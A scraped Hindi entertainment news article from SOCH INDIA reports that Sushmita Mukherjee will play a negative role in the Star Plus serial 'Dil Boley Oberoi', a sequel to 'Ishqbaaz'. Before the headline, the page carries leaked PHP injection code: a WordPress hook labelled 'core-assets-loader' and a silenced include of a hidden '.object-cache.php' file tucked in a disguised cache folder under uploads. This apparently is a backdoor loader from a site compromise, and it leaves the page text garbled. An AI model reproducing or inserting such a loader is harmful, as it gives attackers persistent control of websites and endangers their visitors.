add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); दिल बोले ओबेरॉय’ से में नेगेटिव रोल में दिखेंगी सुष्मिता मुखर्जी – SOCH INDIA
Menu

मनोरंजन
दिल बोले ओबेरॉय’ से में नेगेटिव रोल में दिखेंगी सुष्मिता मुखर्जी

nobanner

मशहूर एक्ट्रेस सुष्मिता मुखर्जी को ‘दिल बोले ओबेरॉय’ में नेगेटिव रोल के लिए लिया गया है. यह लोकप्रिय सीरियल ‘इश्कबाज’ का एक सीक्वल है. सुष्मिता ने कहा, “मैं इस शो में दादी की बहन के किरदार में रहूंगी, जो नकारात्मक भूमिका है. नकारात्मक भूमिकाएं मेरी विशेषता रही हैं. मुझे लगता है कि यह मेरे भीतर के कलाकार को चुनौती देती है.”

उन्होंने कहा, “अच्छी बात यह है कि मैं ब्लैक एंड व्हाइट युग से रंगीन युग में जा रही हूं. मैं इस शो से जुड़कर उत्साहित हूं.” ‘दिल बोले ओबेरॉय’ लोकप्रिय धारावाहिक ‘इश्कबाज’ का सीक्वल है. इसमें ओंकारा (कुणाल जयसिंह), रुद्र (लीनेश मट्टू) और उनकी प्रेमिकाओं की कहानी को दिखाया गया है. इसका प्रसारण टेलीविजन चैनल स्टार प्लस पर होगा.